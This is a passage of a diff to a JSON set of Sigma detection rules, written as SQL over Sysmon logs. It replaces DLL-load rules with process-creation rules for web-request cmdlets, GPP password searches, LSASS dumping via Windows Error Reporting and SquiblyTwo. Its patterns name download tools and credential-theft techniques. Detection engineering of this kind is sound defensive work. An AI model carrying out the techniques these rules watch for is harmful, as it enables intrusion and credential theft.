ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%Invoke-WebRequest%' ESCAPE '\\' OR CommandLine LIKE '%iwr %' ESCAPE '\\' OR CommandLine LIKE '%wget %' ESCAPE '\\' OR CommandLine LIKE '%curl %' ESCAPE '\\' OR CommandLine LIKE '%Net.WebClient%' ESCAPE '\\' OR CommandLine LIKE '%Start-BitsTransfer%' ESCAPE '\\' OR CommandLine LIKE '%Resume-BitsTransfer%' ESCAPE '\\' OR CommandLine LIKE '%[System.Net.WebRequest]::create%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-RestMethod%' ESCAPE '\\' OR CommandLine LIKE '%WinHttp.WinHttpRequest%' ESCAPE '\\'))" ], - "filename": "image_load_wmi_module_load.yml" + "filename": "proc_creation_win_susp_web_request_cmd_and_cmdlets.yml" }, { - "title": "WMI ActiveScriptEventConsumers Activity Via Scrcons.EXE DLL Load", - "id": "b439f47d-ef52-4b29-9a2f-57d8a96cb6b8", - "status": "test", - "description": "Detects signs of the WMI script host process \"scrcons.exe\" loading scripting DLLs which could indciates WMI ActiveScriptEventConsumers EventConsumers activity.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "title": "Suspicious Sigverif Execution", + "id": "7d4aaec2-08ed-4430-8b96-28420e030e04", + "status": "experimental", + "description": "Detects the execution of sigverif binary as a parent process which could indicate it being used as a LOLBIN to proxy execution", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.privilege_escalation", - "attack.persistence", - "attack.t1546.003" + "attack.defense_evasion", + "attack.t1216" ], "falsepositives": [ - "Legitimate event consumers", - "Dell computers on some versions register an event consumer that is known to cause false positives when brightness is changed by the corresponding keyboard button" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 
'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\scrcons.exe' ESCAPE '\\' AND (ImageLoaded LIKE '%\\\\vbscript.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wbemdisp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wshom.ocx' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\scrrun.dll' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\sigverif.exe' ESCAPE '\\')" ], - "filename": "image_load_scrcons_wmi_scripteventconsumer.yml" + "filename": "proc_creation_win_lolbin_sigverif.yml" }, { - "title": "Third Party Software DLL Sideloading", - "id": "f9df325d-d7bc-4a32-8a1a-2cc61dcefc63", + "title": "Suspicious Workstation Locking via Rundll32", + "id": "3b5b0213-0460-4e3f-8937-3abf98ff7dcc", "status": "experimental", - "description": "Detects DLL sideloading of DLLs that are part of third party software (zoom, discord....etc)", - "author": "Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)", + "description": "Detects a suspicious call to the user32.dll function that locks the user workstation", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" + "attack.defense_evasion" ], "falsepositives": [ - "Unknown" + "Scripts or links on the user desktop used to lock the workstation instead of Windows+L or the menu option" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ImageLoaded LIKE '%\\\\commfunc.dll' ESCAPE '\\' AND NOT (ImageLoaded LIKE '%\\\\AppData\\\\local\\\\Google\\\\Chrome\\\\Application\\\\%' ESCAPE '\\' OR (ImageLoaded LIKE 'C:\\\\Program Files\\\\Lenovo\\\\Communications Utility\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Lenovo\\\\Communications Utility\\\\%' ESCAPE '\\'))) OR (ImageLoaded LIKE '%\\\\tosbtkbd.dll' ESCAPE '\\' AND NOT 
((ImageLoaded LIKE 'C:\\\\Program Files\\\\Toshiba\\\\Bluetooth Toshiba Stack\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Toshiba\\\\Bluetooth Toshiba Stack\\\\%' ESCAPE '\\')))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND ParentImage LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%user32.dll,%' ESCAPE '\\' AND CommandLine LIKE '%LockWorkStation%' ESCAPE '\\')" ], - "filename": "image_load_side_load_third_party.yml" + "filename": "proc_creation_win_rundll32_user32_dll.yml" }, { - "title": "WMI Persistence - Command Line Event Consumer", - "id": "05936ce2-ee05-4dae-9d03-9a391cf2d2c6", + "title": "Findstr GPP Passwords", + "id": "91a2c315-9ee6-4052-a853-6f6a8238f90d", "status": "test", - "description": "Detects WMI command line event consumers", - "author": "Thomas Patzke", + "description": "Look for the encrypted cpassword value within Group Policy Preference files on the Domain Controller. 
This value can be decrypted with gpp-decrypt.", + "author": "frack113", "tags": [ - "attack.t1546.003", - "attack.persistence" + "attack.credential_access", + "attack.t1552.006" ], "falsepositives": [ - "Unknown (data set is too small; further testing needed)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE 'C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\wbemcons.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\findstr.exe' ESCAPE '\\' OR OriginalFileName = 'FINDSTR.EXE') AND (CommandLine LIKE '%cpassword%' ESCAPE '\\' AND CommandLine LIKE '%\\\\sysvol\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.xml%' ESCAPE '\\'))" ], - "filename": "image_load_wmi_persistence_commandline_event_consumer.yml" + "filename": "proc_creation_win_findstr_gpp_passwords.yml" }, { - "title": "VBA DLL Loaded Via Office Application", - "id": "e6ce8457-68b1-485b-9bdd-3c2b5d679aa9", + "title": "Remote Access Tool - GoToAssist Execution", + "id": "b6d98a4f-cef0-4abf-bbf6-24132854a83d", "status": "test", - "description": "Detects VB DLL's loaded by an office application. Which could indicate the presence of VBA Macros.", - "author": "Antonlovesdnb", + "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. 
(Citation: Symantec Living off the Land)\n", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1204.002" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Legitimate macro usage. Add the appropriate filter according to your environment" + "Legitimate use" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\excel.exe' ESCAPE '\\' OR Image LIKE '%\\\\mspub.exe' ESCAPE '\\' OR Image LIKE '%\\\\onenote.exe' ESCAPE '\\' OR Image LIKE '%\\\\onenoteim.exe' ESCAPE '\\' OR Image LIKE '%\\\\outlook.exe' ESCAPE '\\' OR Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR Image LIKE '%\\\\winword.exe' ESCAPE '\\') AND (ImageLoaded LIKE '%\\\\VBE7.DLL' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\VBEUI.DLL' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\VBE7INTL.DLL' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Description = 'GoTo Opener' OR Product = 'GoTo Opener' OR Company = 'LogMeIn, Inc.'))" ], - "filename": "image_load_office_vbadll_load.yml" + "filename": "proc_creation_win_remote_access_tools_gotoopener.yml" }, { - "title": "Suspicious Volume Shadow Copy Vssapi.dll Load", - "id": "37774c23-25a1-4adb-bb6d-8bb9fd59c0f8", - "status": "experimental", - "description": "Detects the image load of VSS DLL by uncommon executables", - "author": "frack113", + "title": "Potential SquiblyTwo Technique Execution", + "id": "8d63dadf-b91b-4187-87b6-34a1114577ea", + "status": "test", + "description": "Detects potential SquiblyTwo attack technique with possible renamed WMIC via Imphash and OriginalFileName fields", + "author": "Markus Neis, Florian Roth", "tags": [ "attack.defense_evasion", - "attack.impact", - "attack.t1490" + "attack.t1047", + "attack.t1220", + "attack.execution", + "attack.t1059.005", + "attack.t1059.007" ], "falsepositives": [ "Unknown" ], - "level": "high", + 
"level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ImageLoaded LIKE '%\\\\vssapi.dll' ESCAPE '\\' AND NOT ((Image LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\Temp\\\\{%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')) OR (Image LIKE 'C:\\\\ProgramData\\\\Package Cache\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR OriginalFileName = 'wmic.exe' OR Imphash IN ('1B1A3F43BF37B5BFE60751F2EE2F326E', '37777A96245A3C74EB217308F3546F4C', '9D87C9D67CE724033C0B40CC4CA1B206') OR (Hashes LIKE '%IMPHASH=1B1A3F43BF37B5BFE60751F2EE2F326E%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=37777A96245A3C74EB217308F3546F4C%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9D87C9D67CE724033C0B40CC4CA1B206%' ESCAPE '\\')) AND (CommandLine LIKE '%format:%' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\'))" ], - "filename": "image_load_dll_vssapi_susp_load.yml" + "filename": "proc_creation_win_wmic_squiblytwo_bypass.yml" }, { - "title": "Potential DLL Sideloading Via VMware Xfer", - "id": "9313dc13-d04c-46d8-af4a-a930cc55d93b", - "status": "experimental", - "description": "Detects loading of a DLL by the VMware Xfer utility from the non-default directory which may be an attempt to sideload arbitrary DLL", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious Spool Service Child Process", + "id": "dcdbc940-0bff-46b2-95f3-2d73f848e33b", + "status": "test", + "description": "Detects suspicious print spool service (spoolsv.exe) child processes.", + "author": "Justin C. 
(@endisphotic), @dreadphones (detection), Thomas Patzke (Sigma rule)", "tags": [ - "attack.defense_evasion", - "attack.t1574.002" + "attack.execution", + "attack.t1203", + "attack.privilege_escalation", + "attack.t1068" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\VMwareXferlogs.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\glib-2.0.dll' ESCAPE '\\') AND NOT (ImageLoaded LIKE 'C:\\\\Program Files\\\\VMware\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\spoolsv.exe' ESCAPE '\\' AND IntegrityLevel = 'System') AND ((((((Image LIKE '%\\\\gpupdate.exe' ESCAPE '\\' OR Image LIKE '%\\\\whoami.exe' ESCAPE '\\' OR Image LIKE '%\\\\nltest.exe' ESCAPE '\\' OR Image LIKE '%\\\\taskkill.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\taskmgr.exe' ESCAPE '\\' OR Image LIKE '%\\\\sc.exe' ESCAPE '\\' OR Image LIKE '%\\\\findstr.exe' ESCAPE '\\' OR Image LIKE '%\\\\curl.exe' ESCAPE '\\' OR Image LIKE '%\\\\wget.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\accesschk.exe' ESCAPE '\\' OR Image LIKE '%\\\\wevtutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\bcdedit.exe' ESCAPE '\\' OR Image LIKE '%\\\\fsutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\cipher.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\write.exe' ESCAPE '\\' OR Image LIKE '%\\\\wuauclt.exe' ESCAPE '\\' OR Image LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR Image LIKE '%\\\\query.exe' ESCAPE '\\') OR ((Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\') AND NOT (CommandLine LIKE '%start%' ESCAPE '\\'))) OR (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' AND NOT ((CommandLine LIKE 
'%.spl%' ESCAPE '\\' OR CommandLine LIKE '%route add%' ESCAPE '\\' OR CommandLine LIKE '%program files%' ESCAPE '\\')))) OR (Image LIKE '%\\\\netsh.exe' ESCAPE '\\' AND NOT ((CommandLine LIKE '%add portopening%' ESCAPE '\\' OR CommandLine LIKE '%rule name%' ESCAPE '\\')))) OR ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND NOT (CommandLine LIKE '%.spl%' ESCAPE '\\'))) OR ((Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND CommandLine LIKE '%rundll32.exe' ESCAPE '\\')))" ], - "filename": "image_load_side_load_vmware_xfer.yml" + "filename": "proc_creation_win_spoolsv_susp_child_processes.yml" }, { - "title": "Aruba Network Service Potential DLL Sideloading", - "id": "90ae0469-0cee-4509-b67f-e5efcef040f7", + "title": "Schtasks Creation Or Modification With SYSTEM Privileges", + "id": "89ca78fd-b37c-4310-b3d3-81a023f83936", "status": "experimental", - "description": "Detects potential DLL sideloading activity via the Aruba Networks Virtual Intranet Access \"arubanetsvc.exe\" process using DLL Search Order Hijacking", + "description": "Detects the creation or update of a scheduled task to run with \"NT AUTHORITY\\SYSTEM\" privileges", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", + "attack.execution", "attack.persistence", - "attack.t1574.001", - "attack.t1574.002" + "attack.t1053.005" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\arubanetsvc.exe' ESCAPE '\\' AND (ImageLoaded LIKE '%\\\\wtsapi32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msvcr100.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msvcp100.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dbghelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dbgcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wininet.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iphlpapi.dll' 
ESCAPE '\\' OR ImageLoaded LIKE '%\\\\version.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptsp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptbase.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wldp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\profapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sspicli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winsta.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dpapi.dll' ESCAPE '\\')) AND NOT ((ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND (CommandLine LIKE '% /change %' ESCAPE '\\' OR CommandLine LIKE '% /create %' ESCAPE '\\') AND CommandLine LIKE '%/ru %' ESCAPE '\\' AND (CommandLine LIKE '%NT AUT%' ESCAPE '\\' OR CommandLine LIKE '% SYSTEM %' ESCAPE '\\')) AND NOT ((ParentImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND ParentImage LIKE '%TeamViewer\\_.exe%' ESCAPE '\\' AND Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/TN TVInstallRestore%' ESCAPE '\\') OR ((CommandLine LIKE '%/Create /F /RU System /SC WEEKLY /TN AviraSystemSpeedupVerify /TR %' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Program Files (x86)\\\\Avira\\\\System Speedup\\\\setup\\\\avira\\_speedup\\_setup.exe%' ESCAPE '\\' OR CommandLine LIKE '%/VERIFY /VERYSILENT /NOSTART /NODOTNET /NORESTART\" /RL HIGHEST%' ESCAPE '\\'))))" ], - "filename": "image_load_side_load_aruba_networks_virtual_intranet_access.yml" + "filename": "proc_creation_win_schtasks_system.yml" }, { - "title": "Suspicious Unsigned Dbghelp/Dbgcore DLL Loaded", - "id": "bdc64095-d59a-42a2-8588-71fd9c9d9abc", + "title": "Suspicious OfflineScannerShell.exe Execution From Another Folder", + "id": "02b18447-ea83-4b1b-8805-714a8a34546a", "status": "test", - "description": "Detects the 
load of dbghelp/dbgcore DLL (used to make memory dumps) by suspicious processes.\nTools like ProcessHacker and some attacker tradecract use MiniDumpWriteDump API found in dbghelp.dll or dbgcore.dll.\nAs an example, SilentTrynity C2 Framework has a module that leverages this API to dump the contents of Lsass.exe and transfer it over the network back to the attacker's machine.\n", - "author": "Perez Diego (@darkquassar), oscd.community, Ecco", + "description": "Use OfflineScannerShell.exe to execute mpclient.dll library in the current working directory", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (ImageLoaded LIKE '%\\\\dbghelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dbgcore.dll' ESCAPE '\\') AND Signed = 'false')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\OfflineScannerShell.exe' ESCAPE '\\' AND NOT ((CurrentDirectory LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\Offline\\\\' ESCAPE '\\') OR (CurrentDirectory = '')))" ], - "filename": "image_load_dll_dbghelp_dbgcore_unsigned_load.yml" + "filename": "proc_creation_win_lolbin_offlinescannershell.yml" }, { - "title": "DLL Load By System Process From Suspicious Locations", - "id": "9e9a9002-56c4-40fd-9eff-e4b09bfa5f6c", + "title": "Potential Credential Dumping Via WER", + "id": "9a4ccd1a-3526-4d99-b980-9f9c5d3a6ff3", "status": "experimental", - "description": "Detects when a system process (ie located in system32, syswow64...etc) loads a DLL from a suspicious location such as %temp%", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects potential credential dumping via Windows Error Reporting LSASS Shtinkering technique which uses the 
Windows Error Reporting to dump lsass", + "author": "@pbssubhash , Nasreddine Bencherchali", "tags": [ - "attack.defense_evasion", - "attack.t1070" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Unknown" + "Windows Error Reporting might produce similar behavior. In that case, check the PID associated with the \"-p\" parameter in the CommandLine." ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\' AND (ImageLoaded LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR ImageLoaded LIKE '%C:\\\\PerfLogs\\\\%' ESCAPE '\\')) AND NOT ((Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR (ImageLoaded LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\System32\\\\rundll32.exe' ESCAPE '\\') OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\setup.exe%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\cleanmgr.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\ssshim.dll' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\v%' ESCAPE '\\' AND Image LIKE '%\\\\mscorsvw.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\Werfault.exe' ESCAPE '\\' OR OriginalFileName = 'WerFault.exe') AND ((ParentUser LIKE '%AUTHORI%' ESCAPE '\\' OR ParentUser LIKE '%AUTORI%' ESCAPE '\\') AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\') AND CommandLine LIKE '% -u -p %' ESCAPE '\\' AND CommandLine LIKE '% -ip %' ESCAPE '\\' 
AND CommandLine LIKE '% -s %' ESCAPE '\\')) AND NOT ((ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\')))" ], - "filename": "image_load_susp_dll_load_system_process.yml" + "filename": "proc_creation_win_werfault_lsass_shtinkering.yml" }, { - "title": "Wmiprvse Wbemcomn DLL Hijack", - "id": "7707a579-e0d8-4886-a853-ce47e4575aaa", + "title": "Logon Scripts (UserInitMprLogonScript)", + "id": "0a98a10c-685d-4ab0-bddc-b6bdd1d48458", "status": "test", - "description": "Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\\Windows\\System32\\wbem\\` directory over the network and loading it for a WMI DLL Hijack scenario.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", - "tags": [ - "attack.execution", - "attack.t1047", - "attack.lateral_movement", - "attack.t1021.002" + "description": "Detects creation or execution of UserInitMprLogonScript persistence method", + "author": "Tom Ueltschi (@c_APT_ure), Tim Shelton", + "tags": [ + "attack.t1037.001", + "attack.persistence" ], "falsepositives": [ - "Unknown" + "Exclude legitimate logon scripts" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\wmiprvse.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\wbem\\\\wbemcomn.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%UserInitMprLogonScript%' ESCAPE '\\' OR (ParentImage LIKE '%\\\\userinit.exe' ESCAPE '\\' AND NOT ((CommandLine LIKE '%netlogon%.bat%' ESCAPE '\\' OR CommandLine LIKE '%UsrLogon.cmd%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\WINDOWS\\\\Explorer.EXE%' ESCAPE '\\') OR (Image LIKE '%\\\\explorer.exe' ESCAPE '\\' OR Image LIKE '%\\\\proquota.exe' ESCAPE '\\' OR Image LIKE '%\\\\Citrix\\\\System32\\\\icast.exe' ESCAPE '\\')))))" ], - "filename": "image_load_wmiprvse_wbemcomn_dll_hijack.yml" + "filename": 
"proc_creation_win_persistence_userinitmprlogonscript.yml" }, { - "title": "Suspicious Volume Shadow Copy VSS_PS.dll Load", - "id": "333cdbe8-27bb-4246-bf82-b41a0dca4b70", + "title": "Wusa Extracting Cab Files", + "id": "59b39960-5f9d-4a49-9cef-1e4d2c1d0cb9", "status": "experimental", - "description": "Detects the image load of vss_ps.dll by uncommon executables", - "author": "Markus Neis, @markus_neis", + "description": "Detects usage of the \"wusa.exe\" (Windows Update Standalone Installer) utility to extract cab using the \"/extract\" argument which is not longer supported. This could indicate an attacker using an old technique", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.impact", - "attack.t1490" + "attack.execution" ], "falsepositives": [ - "Unknown" + "The \"extract\" flag still works on older 'wusa.exe' versions, which could be a legitimate use (monitor the path of the cab being extracted)" + ], + "level": "medium", + "rule": [ + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\wusa.exe' ESCAPE '\\' AND CommandLine LIKE '%/extract:%' ESCAPE '\\')" + ], + "filename": "proc_creation_win_wusa_cab_files_extraction.yml" + }, + { + "title": "Suspicious Program Names", + "id": "efdd8dd5-cee8-4e59-9390-7d4d5e4dd6f6", + "status": "test", + "description": "Detects suspicious patterns in program names or folders that are often found in malicious samples or hacktools", + "author": "Florian Roth (Nextron Systems)", + "falsepositives": [ + "Legitimate tools that accidentally match on the searched patterns" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ImageLoaded LIKE '%\\\\vss\\_ps.dll' ESCAPE '\\' AND NOT ((Image LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\' AND (Image LIKE '%\\\\clussvc.exe' ESCAPE '\\' OR Image LIKE '%\\\\dismhost.exe' ESCAPE '\\' OR Image LIKE 
'%\\\\dllhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\inetsrv\\\\appcmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\inetsrv\\\\iissetup.exe' ESCAPE '\\' OR Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\searchindexer.exe' ESCAPE '\\' OR Image LIKE '%\\\\srtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\svchost.exe' ESCAPE '\\' OR Image LIKE '%\\\\taskhostw.exe' ESCAPE '\\' OR Image LIKE '%\\\\thor.exe' ESCAPE '\\' OR Image LIKE '%\\\\thor64.exe' ESCAPE '\\' OR Image LIKE '%\\\\tiworker.exe' ESCAPE '\\' OR Image LIKE '%\\\\vssvc.exe' ESCAPE '\\' OR Image LIKE '%\\\\WmiPrvSE.exe' ESCAPE '\\' OR Image LIKE '%\\\\System32\\\\SystemPropertiesAdvanced.exe' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')) OR (CommandLine LIKE 'C:\\\\$WinREAgent\\\\Scratch\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\dismhost.exe {%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\CVE-202%' ESCAPE '\\' OR Image LIKE '%\\\\CVE202%' ESCAPE '\\') OR (Image LIKE '%\\\\poc.exe' ESCAPE '\\' OR Image LIKE '%\\\\artifact.exe' ESCAPE '\\' OR Image LIKE '%\\\\artifact64.exe' ESCAPE '\\' OR Image LIKE '%\\\\artifact\\_protected.exe' ESCAPE '\\' OR Image LIKE '%\\\\artifact32.exe' ESCAPE '\\' OR Image LIKE '%\\\\artifact32big.exe' ESCAPE '\\' OR Image LIKE '%obfuscated.exe' ESCAPE '\\' OR Image LIKE '%obfusc.exe' ESCAPE '\\' OR Image LIKE '%\\\\meterpreter' ESCAPE '\\') OR (CommandLine LIKE '%inject.ps1%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-CVE%' ESCAPE '\\' OR CommandLine LIKE '%pupy.ps1%' ESCAPE '\\' OR CommandLine LIKE '%payload.ps1%' ESCAPE '\\' OR CommandLine LIKE '%beacon.ps1%' ESCAPE '\\' OR CommandLine LIKE '%PowerView.ps1%' ESCAPE '\\' OR CommandLine LIKE 